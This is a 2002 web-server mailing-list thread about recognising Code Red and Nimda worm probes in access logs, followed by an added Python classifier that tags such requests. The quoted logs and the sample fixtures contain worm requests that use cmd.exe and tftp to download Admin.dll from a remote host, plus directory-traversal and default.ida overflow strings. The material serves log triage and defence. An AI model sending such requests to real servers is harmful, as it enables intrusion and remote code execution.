Even though my server is patched, when I see the tftp requests, I use the IS Manager and disallow that IP address for server access. Then I never see that particular IP/server in the logs after that. I also took a text file, renamed it to admin.dll, set the +RSH flags on it, and stuck it in the root of all the drives in the server. This was after seeing log entries like the ones below:
208: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#' GET Admin.dll c:\Admin.dll
206: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#' GET Admin.dll d:\Admin.dll
204: : 6/May/02 09:10: /winnt/system32/cmd.exe?/c+tftp -i 'IP.#.#.#.' GET Admin.dll e:\Admin.dll

Peter Hickman wrote:
> Pierre Abbat wrote:
>
>> If it has:
>> NNNNNNNNNNNN it's Code Red 1.
>> XXXXXXXXXXXXX it's Code Red 2.
>> /winnt/ it's Nimda.
>> AAAAAAAAAAAAA it's some new worm that showed up in my web log a few
>> days ago. Where do I report this? I tried bugtraq and the moderator
>> ignored it.
>>
>
> I just wait until it happens enough for someone else (who people will
> listen to) to notice.
>
> If it's part of the /default.ida exploit then you should be safe, it's
> just some kiddiot playing. Providing of course that you have the
> appropriate patch in place.
>
> I think I used to email McAfee and Symantec and then forget all
> about it. Now I just forget it - we run Linux.
>
> Maybe you could try www.messagelabs.com. The truth of it is all these
> places are keyed in on multiple reports from different individuals; if
> you are the only person to have seen it then it really isn't a threat.
>
> Wish these admins would patch their servers.
>
> +------------------------------------------------------------------------
> | This is the analog-help mailing list. To unsubscribe from this
> | mailing list, go to
> | http://lists.isite.net/listgate/analog-help/unsubscribe.html
> |
> | List archives are available at
> | http://www.mail-archive.com/[email protected]/
> | http://lists.isite.net/listgate/analog-help/archives/
> | http://www.tallylist.com/archives/index.cfm/mlist.7
> +------------------------------------------------------------------------

--
Robert Locke
ens inc.
201.291.0990 ext.26
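As an added example (not code from the thread, from analog, or from any of the posters), here is a small Python classifier that applies the rule of thumb quoted in the thread to web-server log lines: a default.ida request whose query starts with a run of N is Code Red 1, a run of X is Code Red 2, a request path containing /winnt/ is Nimda, and anything else aimed at default.ida is reported as unclassified. For Nimda-style requests it also pulls out the address following `tftp -i`, which is where the compromised host is being told to fetch Admin.dll from and is the kind of value you would feed to a blocklist. The sample log lines are constructed in Apache combined format using RFC 5737 documentation addresses, and the regexes and the ten-character N/X threshold are my own assumptions, not anything from the original post.

```python
"""Tag worm probes in web access logs by request-path signature.

Added example, not code from the mailing-list thread. Rules follow the
rule of thumb quoted in the thread (NNNN.. = Code Red 1, XXXX.. = Code
Red 2, /winnt/ = Nimda, other default.ida hits = unclassified). Sample
log lines are constructed; addresses come from RFC 5737 ranges.
"""
import re
from typing import List, NamedTuple, Optional, Set
from urllib.parse import unquote_plus

# Constructed sample input in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [06/May/2002:09:10:01 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 -
192.0.2.11 - - [06/May/2002:09:10:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 -
192.0.2.12 - - [06/May/2002:09:10:03 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll%20c:\\Admin.dll HTTP/1.0" 404 -
192.0.2.13 - - [06/May/2002:09:10:04 -0400] "GET /default.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%u9090 HTTP/1.0" 404 -
192.0.2.14 - - [06/May/2002:09:10:05 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

# client, ident, user, [timestamp], "METHOD path ..." -- enough for our purpose.
REQ_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')
# "tftp -i <ipv4> GET ..." as it appears once the request is URL-decoded.
TFTP_RE = re.compile(r"tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+", re.IGNORECASE)

# Assumed threshold: how many leading N or X characters we require before
# we call the default.ida query a Code Red variant.
FILLER_MIN = 10


class Hit(NamedTuple):
    client: str               # address that sent the probe
    family: str               # worm family label
    tftp_source: Optional[str]  # host named after "tftp -i", Nimda only


def classify_request(path: str) -> Optional[str]:
    """Return the worm family a request path resembles, or None if benign."""
    decoded = unquote_plus(path)  # turns %20 and + into spaces, %5c into a backslash
    if "/winnt/" in decoded.lower():
        return "Nimda"
    if "/default.ida?" in decoded.lower():
        query = decoded.split("?", 1)[1]
        if query.startswith("N" * FILLER_MIN):
            return "Code Red 1"
        if query.startswith("X" * FILLER_MIN):
            return "Code Red 2"
        return "unclassified default.ida variant"
    return None


def tftp_source(path: str) -> Optional[str]:
    """Extract the address after 'tftp -i' from a Nimda-style command line."""
    m = TFTP_RE.search(unquote_plus(path))
    return m.group(1) if m else None


def scan(log_text: str) -> List[Hit]:
    """Run the classifier over every parseable line and keep the matches."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        family = classify_request(m.group("path"))
        if family is None:
            continue
        hits.append(Hit(m.group("client"), family, tftp_source(m.group("path"))))
    return hits


def tftp_sources(hits: List[Hit]) -> Set[str]:
    """Distinct tftp hosts seen in Nimda probes, a starting point for a blocklist."""
    return {h.tftp_source for h in hits if h.tftp_source}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(f"{hit.client:15} {hit.family:34} tftp source: {hit.tftp_source or '-'}")
    print("tftp sources seen:", sorted(tftp_sources(found)))
```

The request is URL-decoded before matching so that `%20`, `+` and the double-encoded `%255c` traversal all collapse to what the worm actually executes; the family check then only looks at the path and query, so the same functions work on analog-style extracts as long as the request string is passed in. Treat the output as triage, not proof: a request that merely contains `/winnt/` is a probe against your server, and a patched host will return 404 for all of it, as the thread notes.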
